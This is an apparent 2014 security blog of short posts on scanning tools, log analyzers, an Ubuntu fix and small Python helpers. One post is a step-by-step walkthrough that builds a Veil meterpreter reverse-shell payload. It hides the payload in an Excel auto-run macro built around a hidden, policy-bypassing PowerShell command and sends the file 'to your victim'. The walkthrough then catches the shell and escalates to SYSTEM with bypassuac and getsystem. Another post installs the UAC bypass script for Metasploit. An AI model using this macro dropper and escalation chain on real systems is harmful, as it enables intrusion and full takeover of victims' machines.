Jun 7, 2014

CheatSheet: IPv6

Source: http://www.sans.org/security-resources/ipv6_tcpip_pocketguide.pdf

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jun 6, 2014

Howto: Scan a target against the CVE and OSVDB databases with Nmap

1. Download vulscan from http://www.computec.ch/projekte/vulscan/?s=download

2. Extract it to /usr/share/nmap/script/

3. Scan target with script
nmap -sS -sV --script=vulscan/vulscan.nse <target>
nmap -sS -sV --script=vulscan/vulscan.nse --script-args vulscandb=scipvuldb.csv <target>


Using nmap to scan for DDOS reflectors

nmap -sU -A -PN -n -pU:19,53,123,161 --script=ntp-monlist,dns-recursion,snmp-sysdescr <target>

- ntp-monlist -> while any open NTP service can be used in a reflective DDoS attack, the maximum amplification is achieved with NTP services that permit the monlist command to be executed. This script checks whether monlist can be executed against an open NTP port.

- dns-recursion -> Normally public DNS servers will only answer DNS queries for which they are authoritative. A DNS server that permits and processes queries for names it is not authoritative for is called a recursive DNS server, and open recursive DNS servers are in most cases misconfigured.

- snmp-sysdescr -> attempts to extract more information from the SNMP service. It will usually display more information, which may tell you more about the device you are scanning.

Source: https://isc.sans.edu/forums/diary/Using+nmap+to+scan+for+DDOS+reflectors/18193


Tools: ngxtop - real-time metrics for nginx server (and others)

ngxtop parses your nginx access log and outputs useful, top-like metrics of your nginx server, so you can tell what is happening with your server in real time.
ngxtop tries to determine the correct location and format of the nginx access log file by default, so you can just run ngxtop and have a close look at all requests coming to your nginx server. But it does not limit you to nginx and the default top view. ngxtop is flexible enough for you to configure and change most of its behaviour. You can query for different things, specify your log and format, and even parse a remote Apache common access log with ease. See the sample usages below for some ideas about what you can do with it.


pip install ngxtop
Note: ngxtop is primarily developed and tested with python2 but also supports python3.


    ngxtop [options]
    ngxtop [options] (print|top|avg|sum) <var>
    ngxtop info

    -l <file>, --access-log <file>  access log file to parse.
    -f <format>, --log-format <format>  log format as specified in the log_format directive.
    --no-follow  ngxtop default behavior is to ignore current lines in log
                     and only watch for new lines as they are written to the access log.
                     Use this flag to tell ngxtop to process the current content of the access log instead.
    -t <seconds>, --interval <seconds>  report interval when running in follow mode [default: 2.0]

    -g <var>, --group-by <var>  group by variable [default: request_path]
    -w <expr>, --having <expr>  having clause [default: 1]
    -o <var>, --order-by <var>  order of output for default query [default: count]
    -n <number>, --limit <number>  limit the number of records included in report for top command [default: 10]
    -a <exp> ..., --a <exp> ...  add exp (must be aggregation exp: sum, avg, min, max, etc.) into output

    -v, --verbose  more verbose output
    -d, --debug  print every line and parsed record
    -h, --help  print this help message.
    --version  print version information.

    Advanced / experimental options:
    -c <file>, --config <file>  allow ngxtop to parse nginx config file for log format and location.
    -i <filter-expression>, --filter <filter-expression>  filter in: only records satisfying the given expression are processed.
    -p <filter-expression>, --pre-filter <filter-expression>  in-filter expression checked in the pre-parsing phase.


Default output

$ ngxtop
running for 411 seconds, 64332 records processed: 156.60 req/sec

|   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
|   64332 |         2775.251 | 61262 |  2994 |    71 |     5 |

| request_path                             |   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
| /abc/xyz/xxxx                            |   20946 |          434.693 | 20935 |     0 |    11 |     0 |
| /xxxxx.json                              |    5633 |         1483.723 |  5633 |     0 |     0 |     0 |
| /xxxxx/xxx/xxxxxxxxxxxxx                 |    3629 |         6835.499 |  3626 |     0 |     3 |     0 |
| /xxxxx/xxx/xxxxxxxx                      |    3627 |        15971.885 |  3623 |     0 |     4 |     0 |
| /xxxxx/xxx/xxxxxxx                       |    3624 |         7830.236 |  3621 |     0 |     3 |     0 |
| /static/js/minified/utils.min.js         |    3031 |         1781.155 |  2104 |   927 |     0 |     0 |
| /static/js/minified/xxxxxxx.min.v1.js    |    2889 |         2210.235 |  2068 |   821 |     0 |     0 |
| /static/tracking/js/xxxxxxxx.js          |    2594 |         1325.681 |  1927 |   667 |     0 |     0 |
| /xxxxx/xxx.html                          |    2521 |          573.597 |  2520 |     0 |     1 |     0 |
| /xxxxx/xxxx.json                         |    1840 |          800.542 |  1839 |     0 |     1 |     0 |

View top source IPs of clients

$ ngxtop top remote_addr
running for 20 seconds, 3215 records processed: 159.62 req/sec

top remote_addr
| remote_addr     |   count |
| (addresses redacted in the original) |      20 |
| (addresses redacted in the original) |      16 |
| ...             |     ... |

List 4xx or 5xx responses together with HTTP referer

$ ngxtop -i 'status >= 400' print request status http_referer
running for 2 seconds, 28 records processed: 13.95 req/sec

request, status, http_referer:
| request   |   status | http_referer   |
| -         |      400 | -              |

Parse apache log from remote server with common format

$ ssh user@remote_server tail -f /var/log/apache2/access.log | ngxtop -f common
running for 20 seconds, 1068 records processed: 53.01 req/sec

|   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
|    1068 |        28026.763 |  1029 |    20 |    19 |     0 |

| request_path                             |   count |   avg_bytes_sent |   2xx |   3xx |   4xx |   5xx |
| /xxxxxxxxxx                              |     199 |        55150.402 |   199 |     0 |     0 |     0 |
| /xxxxxxxx/xxxxx                          |     167 |        47591.826 |   167 |     0 |     0 |     0 |
| /xxxxxxxxxxxxx/xxxxxx                    |      25 |         7432.200 |    25 |     0 |     0 |     0 |
| /xxxx/xxxxx/x/xxxxxxxxxxxxx/xxxxxxx      |      22 |          698.727 |    22 |     0 |     0 |     0 |
| /xxxx/xxxxx/x/xxxxxxxxxxxxx/xxxxxx       |      19 |         7431.632 |    19 |     0 |     0 |     0 |
| /xxxxx/xxxxx/                            |      18 |         7840.889 |    18 |     0 |     0 |     0 |
| /xxxxxxxx/xxxxxxxxxxxxxxxxx              |      15 |         7356.000 |    15 |     0 |     0 |     0 |
| /xxxxxxxxxxx/xxxxxxxx                    |      15 |         9978.800 |    15 |     0 |     0 |     0 |
| /xxxxx/                                  |      14 |            0.000 |     0 |    14 |     0 |     0 |
| /xxxxxxxxxx/xxxxxxxx/xxxxx               |      13 |        20530.154 |    13 |     0 |     0 |     0 |

Source: https://github.com/lebinh/ngxtop
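To show what ngxtop is doing behind the tables above, here is an added example (not ngxtop's own code) that re-implements its default view in a few functions: it parses nginx 'combined' access-log lines, groups them by request_path with count, avg_bytes_sent and the 2xx/3xx/4xx/5xx split, and applies the equivalent of `-i 'status >= 400' print request status http_referer`. The log lines are constructed.

```python
import re
from collections import defaultdict

# nginx 'combined' log_format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent
#   "$http_referer" "$http_user_agent"
COMBINED_RE = re.compile(
    r'(?P<remote_addr>\S+) - (?P<remote_user>\S+) \[(?P<time_local>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<body_bytes_sent>\d+|-) '
    r'"(?P<http_referer>[^"]*)" "(?P<http_user_agent>[^"]*)"'
)


def parse_line(line):
    """Return a dict of named log variables for one line, or None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    rec['body_bytes_sent'] = 0 if rec['body_bytes_sent'] == '-' else int(rec['body_bytes_sent'])
    # request_path is derived from $request: "GET /path?x=1 HTTP/1.1" -> "/path"
    parts = rec['request'].split()
    rec['request_path'] = parts[1].split('?')[0] if len(parts) >= 2 else '-'
    return rec


def analyze(text):
    """Parse every line, silently skipping lines that do not match the format."""
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def summarize(records, group_by='request_path'):
    """Aggregate like the default view: count, avg_bytes_sent and status classes per group."""
    groups = defaultdict(lambda: {'count': 0, 'bytes': 0,
                                  '2xx': 0, '3xx': 0, '4xx': 0, '5xx': 0})
    for rec in records:
        g = groups[rec[group_by]]
        g['count'] += 1
        g['bytes'] += rec['body_bytes_sent']
        cls = '%dxx' % (rec['status'] // 100)
        if cls in g:            # 1xx responses are counted but not classed
            g[cls] += 1
    return {
        key: {'count': g['count'],
              'avg_bytes_sent': round(g['bytes'] / g['count'], 3),
              '2xx': g['2xx'], '3xx': g['3xx'], '4xx': g['4xx'], '5xx': g['5xx']}
        for key, g in groups.items()
    }


def filter_records(records, predicate):
    """Equivalent of  -i '<expr>': keep only records for which predicate(record) is true."""
    return [r for r in records if predicate(r)]


def print_fields(records, *fields):
    """Equivalent of  print <var> ...: one tuple of the requested variables per record."""
    return [tuple(r[f] for f in fields) for r in records]


# Constructed sample log (addresses are documentation ranges, paths mimic the tables above).
SAMPLE_LOG = """\
203.0.113.10 - - [07/Jun/2014:10:00:01 +0700] "GET /abc/xyz/xxxx HTTP/1.1" 200 434 "-" "Mozilla/5.0"
203.0.113.10 - - [07/Jun/2014:10:00:02 +0700] "GET /abc/xyz/xxxx?id=2 HTTP/1.1" 200 436 "-" "Mozilla/5.0"
203.0.113.11 - - [07/Jun/2014:10:00:03 +0700] "GET /static/js/minified/utils.min.js HTTP/1.1" 304 0 "http://www.example.com/" "Mozilla/5.0"
198.51.100.7 - - [07/Jun/2014:10:00:04 +0700] "GET /xxxxx/xxx.html HTTP/1.1" 404 162 "-" "-"
198.51.100.7 - - [07/Jun/2014:10:00:05 +0700] "POST /xxxxx.json HTTP/1.1" 500 1483 "http://referer.example/" "curl/7.35"
this line does not match the combined format and is skipped
"""

if __name__ == '__main__':
    recs = analyze(SAMPLE_LOG)
    for path, row in sorted(summarize(recs).items(), key=lambda kv: -kv[1]['count']):
        print(path, row)
    errors = filter_records(recs, lambda r: r['status'] >= 400)
    print(print_fields(errors, 'request', 'status', 'http_referer'))
```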


Article: Explaining the serious CCS (ChangeCipherSpec) vulnerability and others in OpenSSL

A new article about the serious CCS Injection and DTLS DoS vulnerabilities, and others in OpenSSL, dated 6/6/2014.


Tools: WebCookiesSniffer - Capture Web site cookies

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Source: http://www.nirsoft.net/utils/web_cookies_sniffer.html
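As an added example (not WebCookiesSniffer's code), the following parses captured cookie strings into the name/value form the tool's lower pane shows, and flags which cookies a passive sniffer on the path can actually read: those set over plaintext HTTP or set without the Secure attribute. The hosts and cookie values are constructed.

```python
def parse_cookie_header(value):
    """Parse a request 'Cookie:' header value ("a=1; b=2") into a list of (name, value)."""
    pairs = []
    for part in value.split(';'):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition('=')
        pairs.append((name.strip(), val.strip() if sep else ''))
    return pairs


def parse_set_cookie(value):
    """Parse a response 'Set-Cookie:' header value into (name, value, attributes).
    Attribute names are case-insensitive (RFC 6265), so they are lower-cased; flag
    attributes such as Secure and HttpOnly map to True."""
    first, *rest = value.split(';')
    name, _, val = first.strip().partition('=')
    attributes = {}
    for attr in rest:
        attr = attr.strip()
        if not attr:
            continue
        key, sep, v = attr.partition('=')
        attributes[key.strip().lower()] = v.strip() if sep else True
    return name.strip(), val.strip(), attributes


def sniffable_cookies(capture):
    """capture: list of (host, scheme, set_cookie_value) as a sniffer would see them.
    A cookie is exposed to a passive observer if it was set over http://, or if it
    lacks the Secure flag (the browser will then also send it on later plaintext
    requests to that host).  Returns [(host, cookie_name), ...]."""
    exposed = []
    for host, scheme, header in capture:
        name, _, attrs = parse_set_cookie(header)
        if scheme == 'http' or 'secure' not in attrs:
            exposed.append((host, name))
    return exposed


# Constructed capture, modelled on the host/cookie-string rows of the tool's upper pane.
CAPTURE = [
    ('www.example.com', 'https', 'sessionid=abc123; Path=/; Secure; HttpOnly'),
    ('www.example.com', 'https', 'prefs=lang%3Den; Path=/; Max-Age=31536000'),
    ('blog.example.net', 'http', 'PHPSESSID=9f86d08; path=/'),
]

if __name__ == '__main__':
    for host, _, header in CAPTURE:
        print(host, parse_set_cookie(header))
    print('readable by a passive sniffer:', sniffable_cookies(CAPTURE))
```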


Jun 5, 2014

Howto: Fix Problem about X session Ubuntu 14.04 with Parallel Tool

1. Start up your wonky Ubuntu 14.04 Desktop VM.
2. Log in, and after everything settles down, make sure the Parallels Desktop Status Bar for the VM is showing; you can toggle it using the View menu on the Parallels Desktop system menu.
3. Click the keyboard icon on the VM's Status Bar (it's the left-most icon in the group of icons to the right) and select 'Ctrl-Alt-F1' to get the Ubuntu console.
4. Log in with an administrator account, such as the one you used to initially install the wonky Parallels Tools.
5. Do the following: cd /etc/X11
6. Do the following: ls -al
7. Look for the following file left in limbo by Parallels Tools: xorg.conf.[datestring], where [datestring] reflects the date and time you installed the wonky Parallels Tools (e.g., xorg.conf.20140525)
8. Do the following to rename the xorg.conf.[datestring] file to just xorg.conf, using your admin password: sudo mv xorg.conf.[datestring] xorg.conf
9. Do the following to force X11 to reconfigure:
a. Change to your home directory: cd ~
b. Look for a directory named '.config'. (Note the leading '.' on the name - it's hidden.) If it is there, do the following to remove it: rm -rf .config
c. Look for a directory named '.compiz'. (Again, note the leading '.' on the name.) If it is there, which this one may not be, do the following to remove it: rm -rf .compiz
10. Reboot, using your admin password, by doing the following: sudo reboot

Source: http://forum.parallels.com/showthread.php?302652-Beware-of-Ubuntu-14-04 


CheatSheet: Vim text editor visual cheat sheet From Linux FAQ


Tools: Webfwlog - Flexible web-based firewall log analyzer and reporting tool

Webfwlog is a flexible web-based firewall log analyzer and reporting tool. It supports standard system logs for linux, FreeBSD, OpenBSD, NetBSD, Solaris, Irix, OS X, etc. as well as Windows XP®. Supported log file formats are netfilter, ipfilter, ipfw, ipchains and Windows XP®. Webfwlog also supports logs saved in a database using the ULOG or NFLOG targets of the linux netfilter project, or any other database logs mapped with a view to the ulogd schema. Versions 1 and 2 of ulogd database schemas are supported. Webfwlog is licensed under the GNU GPL.
Webfwlog fully supports IPv6 for database logs, and netfilter and ipfilter system logs.
With Webfwlog you can design reports to use on your logged data in whatever configuration you desire. Included are example reports as a starting point. You can sort a report with a single click, “drill-down” on the reports all the way to the packet level, and save your reports for later use.

Requirements:
  • A web server with PHP >= 4.1
  • Log files in standard netfilter, ipfilter, ipfw, ipchains or Windows XP® format, or database logs populated with the ULOG or NFLOG target of netfilter, or other database logs mapped with a view to ulogd version 1 or 2 schemas
  • A MySQL or PostgreSQL database server:
    • MySQL >= 3.23.52 or any production release of 4.x or 5.x
    • MySQL >= 5 required for IPv6
    • PostgreSQL >= 7.1
    • PostgreSQL >= 7.4 required for IPv6
  • Your favorite web browser.
Source: hack-tools.blackploit.com/2014/06/webfwlog-firewall-log-analyzer.html


Tools: Hooker: Automated Dynamic Analysis of Android Applications

Hooker is an open-source project for dynamic analysis of Android applications. This project provides various tools and applications that can be used to automatically intercept and modify any API calls made by a targeted application. It leverages the Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...) in an Elasticsearch database. A set of Python scripts can be used to automate the execution of an analysis in order to collect all API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed on an Android device (for instance, an emulator) prior to the analysis.
  2. hooker_xp is a Python tool that can be used to control the Android device and trigger the installation and stimulation of an application on it.
  3. hooker_analysis is a Python script that can be used to collect results stored in the Elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact information.
  5. tools/apk_retriever is a Python tool that can be used to download APKs from various online public Android markets.
  6. tools/emulatorCreator is a script that can be used to prepare an emulator.
Source: https://github.com/AndroidHooker/hooker


Tools: Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.


Use it, modify it and distribute it without warranty or implied warranty.


git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.


--domain   || -d    The domain you would like to use as a target.
--pages    || -p    The number of pages you would like to hit from the search engine. Default: 10
--all      || -a    Do all of the spidering checks. This is the default check.
--allpages          Find all pages related to the domain, limited by the --pages option.
--allfiles          Find all file types related to the domain, limited to the ones configured.
--neighbours        Find other domains that are on the same IP address.
--urlkeywords       Find page URLs that have 'interesting' keywords in them.
--keywords          Find page content that have 'interesting' keywords in them.
--export   || -e    Request URLs through proxy.
                    Specify a proxy (type://ip:port) or use defaults. Default:
--help     || -h    This output.


- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours 
Source: https://github.com/RandomStorm/passive-spider 


Tools: NINJA-Ping U - high performance network scanner tool

NINJA-PingU Is Not Just a Ping Utility is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin creation.
NINJA-PingU comes out of the box with a set of plugins for service analysis and embedded-device identification. More information about those can be found on its home page at http://owasp.github.io/NINJA-PingU

Source: https://github.com/OWASP/NINJA-PingU


Jun 4, 2014

Howto: Install "Bypassuac" script for Metasploit Post Exploitation in Kali

Bypassuac was used to fix this error:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

After googling, I found a very interesting message:
The getsystem command supports three different methods for elevating your current privileges to SYSTEM, as you can see from this section of source code. When you run getsystem without any parameters, you're actually saying to Meterpreter "please try to get SYSTEM privs using all of the available methods". Meterpreter will try each of those in turn, as soon as one of them succeeds it will stop trying. If it runs out of methods, it will return the error message associated with the latest attempt.

If you want to have Meterpreter use a particular method only, you can force it to do so with the -t option, such as getsystem -t 2 which says "only use the second method".

You'll notice that, in your case, getsystem will result in the same error as getsystem -t 3, which is a side-effect of how getsystem works (ie. the third method is the last one to be tried).

Each method of elevation in getsystem relies on the process having certain properties or permissions. On Windows 7/8/8.1, getsystem will not work with any of these methods because the operating system has been patched to avoid these flaws. To gain SYSTEM privileges on this target you will have to use another method.

So I got bypassuac script
"BypassUAC – Attack that allows you to bypass Windows UAC in Windows Vista and Windows 7 both on x86 and x64 operating systems. This issue has still not been patched to-date and can still be exploited on the most recent operating systems."

Now I found that if I bypass UAC first, I can use the getsystem module.

1. Download script from "http://www.secmaniac.com/files/bypassuac.zip"

2. Extract it.

3. Copy bypassuac.rb to /usr/share/metasploit-framework/scripts/meterpreter/
(If you install by yourself, copy to  /opt/metasploit/apps/pro/scripts/meterpreter/)

4. Copy uac folder to "/usr/share/metasploit-framework/data/exploits/"
(If you install by yourself, copy to /opt/metasploit/apps/pro/msf3/data/exploits/)

5. Now you are ready for post exploitation.


Howto: Embedding Veil Powershell payloads into Office Documents

The original of this howto (the original uses Veil 2.0; I used Veil 2.8.0 and added some details for beginners)

1. Go to Veil-Evasion

2. List the payloads with the list command
> list

3. Create the powershell payload
> 19 (powershell/shellcode_inject/virtual)
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 Payload: powershell/shellcode_inject/virtual loaded

 Available commands:

    set             set a specific option value
    info            show information about the payload
    generate        generate payload
    back            go to the main menu
    exit            exit Veil

 [>] Please enter a command: generate

4. Specify LHOST and LPORT
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 [?] Use msfvenom or supply custom shellcode?

     1 - msfvenom (default)
     2 - Custom

 [>] Please enter the number of your choice: 1

 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload:
 [>] Enter value for 'LHOST', [tab] for local IP:
 [>] Enter value for 'LPORT': 443
 [>] Enter extra msfvenom options in OPTION=value syntax:

 [*] Generating shellcode...

5. Now you have your powershell file
 Veil-Evasion | [Version]: 2.8.0
 [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files:

 Language:        powershell
 Payload:        powershell/shellcode_inject/virtual
 Shellcode:        windows/meterpreter/reverse_tcp
 Options:        LHOST=  LPORT=443
 Payload File:        /root/veil-output/source/payload.bat
 Handler File:        /root/veil-output/handlers/payload_handler.rc

 [*] Your payload files have been generated, don't get caught!
 [!] And don't submit samples to any online scanner! ;)

 [>] press any key to return to the main menu:

6. Exit from Veil-Evasion
> exit

7. Get your powershell payload from payload.bat; the default path is /root/veil-output/source/. Copy the string from 'powershell.exe' to 'ReadToEnd();' into a file.

8. Open Office (Excel)

9. Go to the Developer tab (if it doesn't exist, go to File -> Excel Options -> click the Popular button at the left -> under Top Options for Working with Excel, check the "Show Developer tab in the Ribbon" option -> click the OK button to finish editing.)

10. Once you have the Developer tab, click Visual Basic

11. Create the subroutine "Workbook_Open()", create two new String variables, "exec" and "str", and paste this as the string value for "exec" in the VBA pane.

12. Copy the string after "FromBase64String", cut the entire section between the quotation marks, and insert it into the "str" variable.

Sub Workbook_open()
Dim exec As String
Dim str As String

str = "<base64 string copied from payload.bat, split across several str = str + "..." lines>"

13. Next, we need to properly escape all the quotation marks on the line by changing \" to \"". There are occurrences before "Invoke-Expression", and before and after the variable "str". Finally, we place the entire thing into a Shell().

Sub Workbook_open()
Dim exec As String
Dim str As String

str = "<base64 string copied from payload.bat, split across several str = str + "..." lines>"

exec = "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRe"
exec = exec + "ader ($(New-Object IO.Compression.DeflateStream "
exec = exec + "($(New-Object IO.MemoryStream (,$([Convert]::Fro"
exec = exec + "mBase64String(\"" " & str & " \"" )))), [IO.Comp"
exec = exec + "ression.CompressionMode]::Decompress)), [Text.En"
exec = exec + "coding]::ASCII)).ReadToEnd();"""

14. Save it as an Excel Macro-Enabled Workbook and send it to your victim machine.

15. Go to Metasploit and create the handler (the payload is windows/meterpreter/reverse_tcp)
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...

16. Wait for the shell. You get it if Excel on the victim machine is macro-enabled or the user is generation Y (says "yes" all the time).

17. Now you have your shell; try post exploitation.

meterpreter > run bypassuac
[*] Creating a reverse meterpreter stager: LHOST= LPORT=4546
[*] Running payload handler
[*] Uploading Windows UACBypass to victim machine.
[*] Bypassing UAC Restrictions on the system....
[*] Meterpreter stager executable 73802 bytes long
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint with UACBypass in effect...
[*] C:\Users\Sumedt\AppData\Local\Temp\kRNpsDrtub.exe /c %TEMP%\KzhrQvyMZeqDA.exe
meterpreter > [*] Meterpreter session 2 opened ( -> at 2014-06-04 08:57:49 +0700

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf post(getsystem) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system (via technique 1).
meterpreter >


Howto: Installing Veil Framework on Kali

Veil framework is a red team toolkit focused on evading detection. It currently contains Veil-Evasion for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and Veil-PowerView for gaining situational awareness on Windows domains.

This post is about installing Veil on Kali.

1. Clone the Veil-Framework from github
# git clone https://github.com/Veil-Framework/Veil

2. Go to the Veil folder
# cd Veil

3. Download (update) Veil-Catapult, Veil-Evasion and Veil-PowerView with the update.sh script

It will take a long time. Grab a drink or a beer, because the script downloads many required applications; after that you will get the install result screen.

4. After the install completes, test one of the 3 modules (Veil-PowerView, Veil-Evasion, Veil-Catapult)

Source: https://github.com/Veil-Framework/Veil


Jun 2, 2014

Article: When Antivirus loses to Malware

Link: https://dl.dropboxusercontent.com/u/2330423/%E0%B9%80%E0%B8%A1%E0%B8%B7%E0%B9%88%E0%B8%AD%20Antivirus%20%E0%B8%9E%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B9%89%E0%B9%83%E0%B8%AB%E0%B9%89%E0%B8%81%E0%B8%B1%E0%B8%9A%20Malware.pdf


Tools: Argus - Real Time Auditing Network Activity

Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information.

Source: hack-tools.blackploit.com/2014/06/argus-v306-real-time-auditing-network.html


Jun 1, 2014

Tools: Subgraph OS - a secure, free, open-source, and verifiably trustworthy OS

The Internet is a hostile environment, and recent revelations have made it more apparent than ever before that the risk to everyday users extends beyond the need to secure the network transport - the endpoint is also at risk.
Subgraph OS was designed from the ground-up to reduce the risks in endpoint systems so that individuals and organizations around the world can communicate, share, and collaborate without fear of surveillance or interference by sophisticated adversaries through network borne attacks.
Subgraph OS is designed to be difficult to attack. This is accomplished through system hardening and a proactive, ongoing focus on security and attack resistance. Subgraph OS also places emphasis on the integrity of installable software packages. 

Source: https://subgraph.com/sgos/index.en.html


Tools: Bro - open-source network traffic analyzer.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and help with troubleshooting.
  • Deployment
    • Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
    • Fully passive traffic analysis off a network tap or monitoring port.
    • Standard libpcap interface for capturing packets.
    • Real-time and offline analysis.
    • Cluster-support for large-scale deployments.
    • Unified management framework for operating both standalone and cluster setups.
    • Open-source under a BSD license.
  • Analysis
    • Comprehensive logging of activity for offline analysis and forensics.
    • Port-independent analysis of application-layer protocols.
    • Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
    • Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
    • Comprehensive IPv6 support.
    • Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
    • Extensive sanity checks during protocol analysis.
    • Support for IDS-style pattern matching.
  • Scripting Language
    • Turing-complete language for expressing arbitrary analysis tasks.
    • Event-based programming model.
    • Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
    • Extensive support for tracking and managing network state over time.
  • Interfacing
    • Default output to well-structured ASCII logs.
    • Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
    • Real-time integration of external input into analyses. Live database input in preparation.
    • External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
    • Ability to trigger arbitrary external processes from within the scripting language.
Source: https://www.bro.org/


Tools: Parsero - Attacking Robots.txt Files

Parsero is a free script written in Python which reads the robots.txt file of a web server and looks at the Disallow entries. The Disallow entries tell the search engines which directories or files hosted on a web server must not be indexed. For example, "Disallow: /portal/login" means that the content at www.example.com/portal/login is not allowed to be indexed by crawlers like Google, Bing, Yahoo... This is how administrators avoid sharing sensitive or private information with the search engines.
But sometimes the paths listed in the Disallow entries are directly accessible to users without a search engine, just by visiting the URL and path, and sometimes they are not available to anybody at all. Because administrators commonly write many Disallow entries, some of which are reachable and some not, you can use Parsero to check the HTTP status code of each Disallow entry and so find out automatically which of these directories are available.
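The check Parsero automates, as an added example that is not Parsero's own code: parse the Disallow entries out of a robots.txt, resolve them against the site, and report which ones answer 200 so an administrator can audit what their own robots.txt is advertising. The fetcher is injected, so the example runs offline against a constructed status table; for a live check of your own server, pass a function that does an HTTP request and returns the status code.

```python
from urllib.parse import urljoin


def parse_disallows(robots_txt):
    """Return the unique Disallow paths, in file order.
    Comments after '#' are stripped, an empty 'Disallow:' (meaning allow all) is
    ignored, and wildcard entries such as /*.php$ are kept verbatim."""
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or ':' not in line:
            continue
        field, _, value = line.partition(':')
        value = value.strip()
        if field.strip().lower() == 'disallow' and value and value not in paths:
            paths.append(value)
    return paths


def check_disallows(base_url, robots_txt, fetch_status):
    """Return [(path, url, status), ...] for every Disallow path.
    fetch_status(url) must return the HTTP status code for that URL."""
    results = []
    for path in parse_disallows(robots_txt):
        url = urljoin(base_url, path)
        results.append((path, url, fetch_status(url)))
    return results


def available(results):
    """Entries that answered 200, i.e. 'hidden' paths anyone can open directly."""
    return [(path, url) for path, url, status in results if status == 200]


# Constructed robots.txt for the audit.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /portal/login
Disallow: /backup/   # old dumps
Disallow: /admin
Disallow:
Allow: /public
Disallow: /admin
"""

# Constructed status table standing in for live responses.
FAKE_STATUS = {
    'http://www.example.com/portal/login': 200,
    'http://www.example.com/backup/': 403,
    'http://www.example.com/admin': 404,
}


def fake_fetch(url):
    return FAKE_STATUS.get(url, 404)


if __name__ == '__main__':
    results = check_disallows('http://www.example.com/', SAMPLE_ROBOTS, fake_fetch)
    for path, url, status in results:
        print(status, url)
    print('reachable despite Disallow:', available(results))
```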
